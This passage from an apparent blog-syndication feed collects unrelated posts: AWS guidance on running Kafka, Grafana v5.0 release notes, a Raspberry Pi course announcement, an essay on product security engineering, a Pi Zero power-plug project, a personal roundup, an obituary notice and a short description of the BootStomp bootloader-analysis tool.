  • It costs 20 percent less than R3.

Note: It’s always best practice to check for the latest changes in instance types.


The network plays a very important role in a distributed system like Kafka. A fast and reliable network ensures that nodes can communicate with each other easily. The available network throughput controls the maximum amount of traffic that Kafka can handle. Network throughput, combined with disk storage, is often the governing factor for cluster sizing.

If you expect your cluster to receive high read/write traffic, select an instance type that offers 10-Gb/s performance.

In addition, choose an option that keeps interbroker network traffic on the private subnet, because this approach allows clients to connect to the brokers. Communication between brokers and clients uses the same network interface and port. For more details, see the documentation about IP addressing for EC2 instances.

If you are deploying in more than one AWS Region, you can connect the two VPCs in the two AWS Regions using cross-region VPC peering. However, be aware of the networking costs associated with cross-AZ deployments.


Kafka has a history of not being backward compatible, but its support of backward compatibility is getting better. During a Kafka upgrade, you should keep your producer and consumer clients on a version equal to or lower than the version you are upgrading from. After the upgrade is finished, you can start using a new protocol version and any new features it supports. There are three upgrade approaches available, discussed following.

Rolling or in-place upgrade

In a rolling or in-place upgrade scenario, upgrade one Kafka broker at a time. Take into consideration the recommendations for doing rolling restarts to avoid downtime for end users.

Downtime upgrade

If you can afford the downtime, you can take your entire cluster down, upgrade each Kafka broker, and then restart the cluster.

Blue/green upgrade

Intuit followed the blue/green deployment model for their workloads, as described following.

If you can afford to create a separate Kafka cluster and upgrade it, we highly recommend the blue/green upgrade scenario. In this scenario, we recommend that you keep your clusters up-to-date with the latest Kafka version. For additional details on Kafka version upgrades or more details, see the Kafka upgrade documentation.

The following illustration shows a blue/green upgrade.

In this scenario, the upgrade plan works like this:

  • Create a new Kafka cluster on AWS.
  • Create a new Kafka producers stack to point to the new Kafka cluster.
  • Create topics on the new Kafka cluster.
  • Test the green deployment end to end (sanity check).
  • Using Amazon Route 53, change the new Kafka producers stack on AWS to point to the new green Kafka environment that you have created.

The roll-back plan works like this:

  • Switch Amazon Route 53 to the old Kafka producers stack on AWS to point to the old Kafka environment.

For additional details on blue/green deployment architecture using Kafka, see the re:Invent presentation Leveraging the Cloud with a Blue-Green Deployment Architecture.

Performance tuning

You can tune Kafka performance in multiple dimensions. Following are some best practices for performance tuning.

 These are some general performance tuning techniques:

  • If throughput is less than network capacity, try the following:
    • Add more threads
    • Increase batch size
    • Add more producer instances
    • Add more partitions
  • To improve latency when acks =-1, increase your num.replica.fetches value.
  • For cross-AZ data transfer, tune your buffer settings for sockets and for OS TCP.
  • Make sure that num.io.threads is greater than the number of disks dedicated for Kafka.
  • Adjust num.network.threads based on the number of producers plus the number of consumers plus the replication factor.
  • Your message size affects your network bandwidth. To get higher performance from a Kafka cluster, select an instance type that offers 10 Gb/s performance.

For Java and JVM tuning, try the following:

  • Minimize GC pauses by using the Oracle JDK, which uses the new G1 garbage-first collector.
  • Try to keep the Kafka heap size below 4 GB.


Knowing whether a Kafka cluster is working correctly in a production environment is critical. Sometimes, just knowing that the cluster is up is enough, but Kafka applications have many moving parts to monitor. In fact, it can easily become confusing to understand what’s important to watch and what you can set aside. Items to monitor range from simple metrics about the overall rate of traffic, to producers, consumers, brokers, controller, ZooKeeper, topics, partitions, messages, and so on.

For monitoring, Intuit used several tools, including Newrelec, Wavefront, Amazon CloudWatch, and AWS CloudTrail. Our recommended monitoring approach follows.

For system metrics, we recommend that you monitor:

  • CPU load
  • Network metrics
  • File handle usage
  • Disk space
  • Disk I/O performance
  • Garbage collection
  • ZooKeeper

For producers, we recommend that you monitor:

  • Batch-size-avg
  • Compression-rate-avg
  • Waiting-threads
  • Buffer-available-bytes
  • Record-queue-time-max
  • Record-send-rate
  • Records-per-request-avg

For consumers, we recommend that you monitor:

  • Batch-size-avg
  • Compression-rate-avg
  • Waiting-threads
  • Buffer-available-bytes
  • Record-queue-time-max
  • Record-send-rate
  • Records-per-request-avg


Like most distributed systems, Kafka provides the mechanisms to transfer data with relatively high security across the components involved. Depending on your setup, security might involve different services such as encryption, Kerberos, Transport Layer Security (TLS) certificates, and advanced access control list (ACL) setup in brokers and ZooKeeper. The following tells you more about the Intuit approach. For details on Kafka security not covered in this section, see the Kafka documentation.

Encryption at rest

For EBS-backed EC2 instances, you can enable encryption at rest by using Amazon EBS volumes with encryption enabled. Amazon EBS uses AWS Key Management Service (AWS KMS) for encryption. For more details, see Amazon EBS Encryption in the EBS documentation. For instance store–backed EC2 instances, you can enable encryption at rest by using Amazon EC2 instance store encryption.

Encryption in transit

Kafka uses TLS for client and internode communications.


Authentication of connections to brokers from clients (producers and consumers) to other brokers and tools uses either Secure Sockets Layer (SSL) or Simple Authentication and Security Layer (SASL).

Kafka supports Kerberos authentication. If you already have a Kerberos server, you can add Kafka to your current configuration.


In Kafka, authorization is pluggable and integration with external authorization services is supported.

Backup and restore

The type of storage used in your deployment dictates your backup and restore strategy.

The best way to back up a Kafka cluster based on instance storage is to set up a second cluster and replicate messages using MirrorMaker. Kafka’s mirroring feature makes it possible to maintain a replica of an existing Kafka cluster. Depending on your setup and requirements, your backup cluster might be in the same AWS Region as your main cluster or in a different one.

For EBS-based deployments, you can enable automatic snapshots of EBS volumes to back up volumes. You can easily create new EBS volumes from these snapshots to restore. We recommend storing backup files in Amazon S3.

For more information on how to back up in Kafka, see the Kafka documentation.


In this post, we discussed several patterns for running Kafka in the AWS Cloud. AWS also provides an alternative managed solution with Amazon Kinesis Data Streams, there are no servers to manage or scaling cliffs to worry about, you can scale the size of your streaming pipeline in seconds without downtime, data replication across availability zones is automatic, you benefit from security out of the box, Kinesis Data Streams is tightly integrated with a wide variety of AWS services like Lambda, Redshift, Elasticsearch and it supports open source frameworks like Storm, Spark, Flink, and more. You may refer to kafka-kinesis connector.

If you have questions or suggestions, please comment below.

Additional Reading

If you found this post useful, be sure to check out Implement Serverless Log Analytics Using Amazon Kinesis Analytics and Real-time Clickstream Anomaly Detection with Amazon Kinesis Analytics.

About the Author

Prasad Alle is a Senior Big Data Consultant with AWS Professional Services. He spends his time leading and building scalable, reliable Big data, Machine learning, Artificial Intelligence and IoT solutions for AWS Enterprise and Strategic customers. His interests extend to various technologies such as Advanced Edge Computing, Machine learning at Edge. In his spare time, he enjoys spending time with his family.



Grafana v5.0 Released

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/03/01/grafana-v5.0-released/

v5.0 Stable Released

We have been working on Grafana v5 for most of 2017 and it’s finally ready! This release is important
in a different way than previous releases as main focus has been on improving the core Grafana features and attributes.
That means vastly improved UX and page design, easier and more flexible dashboard building enabled by a
new grid layout system. Better support for large installations with the addition of Dashboard Folders, Teams and Permissions.
Improvements to provisioning/cloud-native setups by making datasources & dashboards configurable from files.

This is the most substantial update that Grafana has ever seen.

Download Grafana 5.0 Now

What’s New in Grafana v5.0

Video showing new features

New Dashboard Layout Engine

The new dashboard layout engine allows for much easier movement and sizing of panels, as other panels now move out of the way in
a very intuitive way. Panels are sized independently, so rows are no longer necessary to create layouts. This opens
up many new types of layouts where panels of different heights can be aligned easily. Checkout the new grid in the video
above or on the play site. All your existing dashboards will automatically migrate to the
new position system and look close to identical. The new panel position makes dashboards saved in v5.0 incompatible
with older versions of Grafana.

New UX

Almost every page has seen significant UX improvements. All pages (except dashboard pages) have a new tab-based layout that improves navigation between pages. The side menu has also changed quite a bit. You can still hide the side menu completely if you click on the Grafana logo.

Dashboard Settings

Dashboard pages have a new header toolbar where buttons and actions are now all moved to the right. All the dashboard
settings views have been combined with a side nav which allows you to easily move between different setting categories.

New Light Theme

This theme has not seen a lot of love in recent years and we felt it was time to give it a major overhaul. We are very happy with the result.

Dashboard Folders

The big new feature that comes with Grafana v5.0 is dashboard folders. Now you can organize your dashboards in folders,
which is very useful if you have a lot of dashboards or multiple teams.

  • New search design adds expandable sections for each folder, starred and recently viewed dashboards.
  • New manage dashboard pages enable batch actions and views for folder settings and permissions.
  • Set permissions on folders and have dashboards inherit the permissions.


A team is a new concept in Grafana v5. They are simply a group of users that can be used in the new permission system for dashboards and folders. Only an admin can create teams.
We hope to do more with teams in future releases like integration with LDAP and a team landing page.


You can assign permissions to folders and dashboards. The default user role-based permissions can be removed and
replaced with specific teams or users enabling more control over what a user can see and edit.

Dashboard permissions only limits what dashboards & folders a user can view & edit not which
data sources a user can access nor what queries a user can issue.

Provisioning from configuration

In previous versions of Grafana, you could only use the API for provisioning data sources and dashboards.
But that required the service to be running before you started creating dashboards and you also needed to
set up credentials for the HTTP API. In v5.0 we decided to improve this experience by adding a new active
provisioning system that uses config files. This will make GitOps more natural as data sources and dashboards can
be defined via files that can be version controlled. We hope to extend this system to later add support for users, orgs
and alerts as well.

Data sources

Data sources can now be setup using config files. These data sources are by default not editable from the Grafana GUI.
It’s also possible to update and delete data sources from the config file. More info in the data source provisioning docs.


We also deprecated the [dashboard.json] in favor of our new dashboard provisioner that keeps dashboards on disk
in sync with dashboards in Grafana’s database. The dashboard provisioner has multiple advantages over the old
[dashboard.json] feature. Instead of storing the dashboard in memory we now insert the dashboard into the database,
which makes it possible to star them, use one as the home dashboard, set permissions and other features in Grafana that
expects the dashboards to exist in the database. More info in the dashboard provisioning docs

Graphite Tags & Integrated Function Docs

The Graphite query editor has been updated to support the latest Graphite version (v1.1) that adds
many new functions and support for querying by tags. You can now also view function documentation right in the query editor!

Read more on Graphite Tag Support.


Checkout the CHANGELOG.md file for a complete list
of new features, changes, and bug fixes.


Head to download page for download links & instructions.


A big thanks to all the Grafana users who contribute by submitting PRs, bug reports & feedback!

Transition from Scratch to Python with FutureLearn

Post Syndicated from Dan Fisher original https://www.raspberrypi.org/blog/futurelearn-scratch-to-python/

With the launch of our first new free online course of 2018 — Scratch to Python: Moving from Block- to Text-based Programming — two weeks away, I thought this would be a great opportunity to introduce you to the ins and outs of the course content so you know what to expect.

FutureLearn: Moving from Scratch to Python

Learn how to apply the thinking and programming skills you’ve learnt in Scratch to text-based programming languages like Python.

Take the plunge into text-based programming

The idea for this course arose from our conversations with educators who had set up a Code Club in their schools. Most people start a club by teaching Scratch, a block-based programming language, because it allows learners to drag and drop blocks of pre-written code into a window to create a program. The blocks automatically snap together, making it easy to build fun and educational projects that don’t require much troubleshooting. You can do almost anything a beginner could wish for with Scratch, even physical computing to control LEDs, buzzers, buttons, motors, and more!

Scratch to Python FutureLearn Raspberry Pi

However, on our face-to-face training programme Picademy, educators told us that they were finding it hard to engage children who had outgrown Scratch and needed a new challenge. It was easy for me to imagine: a young learner, who once felt confident about programming using Scratch, is now confused by the alien, seemingly awkward interface of Python. What used to take them minutes in Scratch now takes them hours to code, and they start to lose interest — not a good result, I’m sure you’ll agree. I wanted to help educators to navigate this period in their learners’ development, and so I’ve written a course that shows you how to take the programming and thinking skills you and your learners have developed in Scratch, and apply them to Python.

Scratch to Python FutureLearn Raspberry Pi

Who is the course for?

Educators from all backgrounds who are working with secondary school-aged learners. It will also be interesting to anyone who has spent time working with Scratch and wants to understand how programming concepts translate between different languages.

“It was great fun, and I thought that the ideas and resources would be great to use with Year 7 classes.”
Sue Grey, Classroom Teacher

What is covered?

After showing you the similarities and differences of Scratch and Python, and how the skills learned using one can be applied to the other, we will look at turning more complex Scratch scripts into Python programs. Through creating a Mad Libs game and developing a username generator, you will see how programs can be simplified in a text-based language. We will give you our top tips for debugging Python code, and you’ll have the chance to share your ideas for introducing more complex programs to your students.

Scratch to Python FutureLearn Raspberry Pi

After that, we will look at different data types in Python and write a script to calculate how old you are in dog years. Finally, you’ll dive deeper into the possibilities of Python by installing and using external Python libraries to perform some amazing tasks.

By the end of the course, you’ll be able to:

  • Transfer programming and thinking skills from Scratch to Python
  • Use fundamental Python programming skills
  • Identify errors in your Python code based on error messages, and debug your scripts
  • Produce tools to support students’ transition from block-based to text-based programming
  • Understand the power of text-based programming and what you can create with it

Where can I sign up?

The free four-week course starts on 12 March 2018, and you can sign up now on FutureLearn. While you’re there, be sure to check out our other free courses, such as Prepare to Run a Code Club, Teaching Physical Computing with a Raspberry Pi and Python, and our second new course Build a Makerspace for Young People — more information on it will follow in tomorrow’s blog post.

The post Transition from Scratch to Python with FutureLearn appeared first on Raspberry Pi.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting,
process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many
other specializations in our field of expertise – say, incident response or network security – we have virtually no
time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts
on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would
be fitting to follow up with several notes on what I learned about structuring product security work – and about actually
making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security
expert who goes off script and starts dispensing authoritatively-sounding but bogus advice on a topic they know very
little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of
a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken
belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help
– and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act
of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives,
demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better
brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale
sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might
be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk
is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team
spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about
pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive
at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done
while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with
software engineering backgrounds, even if it’s the ownership of a small open-source project or so. This can broaden our horizons, helping us see
that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to reign it in. No matter what the last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of the time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how do you prioritize it, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.

Of course, not all problems can be addressed on framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as a yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize at a scale and given enough time, every defense mechanism is bound to fail – and so, we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.

N-O-D-E’s always-on networked Pi Plug

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/node-pi-plug/

N-O-D-E’s Pi Plug is a simple approach to using a Raspberry Pi Zero W as an always-on networked device without a tangle of wires.

Pi Plug 2: Turn The Pi Zero Into A Mini Server

Today I’m back with an update on the Pi Plug I made a while back. This prototype is still in the works, and is much more modular than the previous version. https://N-O-D-E.net/piplug2.html https://github.com/N-O-D-E/piplug —————- Shop: http://N-O-D-E.net/shop/ Patreon: http://patreon.com/N_O_D_E_ BTC: 17HqC7ZzmpE7E8Liuyb5WRbpwswBUgKRGZ Newsletter: http://eepurl.com/ceA-nL Music: https://archive.org/details/Fwawn-FromManToGod

The Pi Zero Power Case

In a video early last year, YouTuber N-O-D-E revealed his Pi Zero Power Case, an all-in-one always-on networked computer that fits snugly against a wall power socket.

NODE Plug Raspberry Pi Plug

The project uses an official Raspberry Pi power supply, a Zero4U USB hub, and a Raspberry Pi Zero W, and it allows completely wireless connection to a network. N-O-D-E cut the power cord and soldered its wires directly to the power input of the USB hub. The hub powers the Zero via pogo pins that connect directly to the test pads beneath.

The Power Case is a neat project, but it may be a little daunting for anyone not keen on cutting and soldering the power supply wires.

Pi Plug 2

In his overhaul of the design, N-O-D-E has created a modular reimagining of the previous always-on networked computer that fits more streamlined to the wall socket and requires absolutely no soldering or hacking of physical hardware.

Pi Plug

The Pi Plug 2 uses a USB power supply alongside two custom PCBs and a Zero W. While one PCB houses a USB connector that slots directly into the power supply, two blobs of solder on the second PCB press against the test pads beneath the Zero W. When connected, the PCBs run power directly from the wall socket to the Raspberry Pi Zero W. Neat!

NODE Plug Raspberry Pi
NODE Plug Raspberry Pi
NODE Plug Raspberry Pi
NODE Plug Raspberry Pi

While N-O-D-E isn’t currently selling these PCBs in his online store, all files are available on GitHub, so have a look if you want to recreate the Pi Plug.


In another video — and seriously, if you haven’t checked out N-O-D-E’s YouTube channel yet, you really should — he demonstrates a few changes that can turn your Zero into a USB dongle computer. This is a great hack if you don’t want to carry a power supply around in your pocket. As N-O-D-E explains:

Besides simply SSH’ing into the Pi, you could also easily install a remote desktop client and use the GUI. You can share your computer’s internet connection with the Pi and use it just like you would normally, but now without the need for a monitor, chargers, adapters, cables, or peripherals.

We’re keen to see how our community is hacking their Zeros and Zero Ws in order to take full advantage of the small footprint of the computer, so be sure to share your projects and ideas with us, either in the comments below or via social media.

The post N-O-D-E’s always-on networked Pi Plug appeared first on Raspberry Pi.

Weekly roundup: Lost time

Post Syndicated from Eevee original https://eev.ee/dev/2018/02/13/weekly-roundup-lost-time/

I ran out of brain pills near the end of January due to some regulatory kerfuffle, and spent something like a week and a half basically in a daze. I have incredibly a lot of stuff to do right now, too, so not great timing… but, well, I guess no time would be especially good. Oh well. I got a forced vacation and played some Avernum.

Anyway, in the last three weeks, the longest span I’ve ever gone without writing one of these:

  • anise: I added a ✨ completely new menu feature ✨ that looks super cool and amazing and will vastly improve the game.

  • blog: I wrote SUPER game night 3, featuring a bunch of games from GAMES MADE QUICK??? 2.0! It’s only a third of them though, oh my god, there were just so many.

    I also backfilled some release posts, including one for Strawberry Jam 2 — more on that momentarily.

  • ???: Figured out a little roadmap and started on an ???.

  • idchoppers: Went down a whole rabbit hole trying to port some academic C++ to Rust, ultimately so I could intersect arbitrary shapes, all so I could try out this ridiculous idea to infer the progression through a Doom map. This was kind of painful, and is basically the only useful thing I did while unmedicated. I might write about it.

  • misc: I threw together a little PICO-8 prime sieve inspired by this video. It’s surprisingly satisfying.

    (Hmm, does this deserve a release post? Where should its permanent home be? Argh.)

  • art: I started to draw my Avernum party but only finished one of them. I did finish a comic celebrating the return of my brain pills.

  • neon vn: I contributed some UI and bugfixing to a visual novel that’ll be released on Floraverse tomorrow.

  • alice vn: For Strawberry Jam 2, glip and I are making a ludicrously ambitious horny visual novel in Ren’Py. Turns out Ren’Py is impressively powerful, and I’ve been having a blast messing with it. But also our idea requires me to write about sixty zillion words by the end of the month. I guess we’ll see how that goes.

    I have a (NSFW) progress thread going on my smut alt, but honestly, most of the progress for the next week will be “did more writing”.

I’m behind again! Sorry. I still owe a blog post for last month, and a small project for last month, and now blog posts for this month, and Anise game is kinda in limbo, and I don’t know how any of this will happen with this huge jam game taking priority over basically everything else. I’ll see if I can squeeze other stuff in here and there. I intended to draw more regularly this month, too, but wow I don’t think I can even spare an hour a day.

The jam game is forcing me to do a lot of writing that I’d usually dance around and avoid, though, so I think I’ll come out the other side of it much better and faster and more confident.

Welp. Back to writing!

Preining: In memoriam Staszek Wawrykiewicz

Post Syndicated from ris original https://lwn.net/Articles/747123/rss

Norbert Preining reports
the sad news
that Staszek Wawrykiewicz has died. “Staszek was an
active member of the Polish TeX community, and an incredibly valuable TeX
Live Team member. His insistence and perseverance have saved TeX Live from
many disasters and bugs. Although I have been in contact with Staszek over
the TeX Live mailing lists since some years, I met him in person for the
first time on my first ever BachoTeX, the EuroBachoTeX 2007. His
friendliness, openness to all new things, his inquisitiveness, all took a
great place in my heart.
” (Thanks to Paul Wise)

BootStomp – Find Android Bootloader Vulnerabilities

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/02/bootstomp-find-android-bootloader-vulnerabilities/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

BootStomp – Find Android Bootloader Vulnerabilities

BootStomp is a Python-based tool, with Docker support that helps you find two different classes of Android bootloader vulnerabilities and bugs. It looks for memory corruption and state storage vulnerabilities.

Note that BootStomp works with boot-loaders compiled for ARM architectures (32 and 64 bits both) and that results might slightly vary depending on angr and Z3’s versions. This is because of the time angr takes to analyze basic blocks and to Z3’s expression concretization results.

Read the rest of BootStomp – Find Android Bootloader Vulnerabilities now! Only available at Darknet.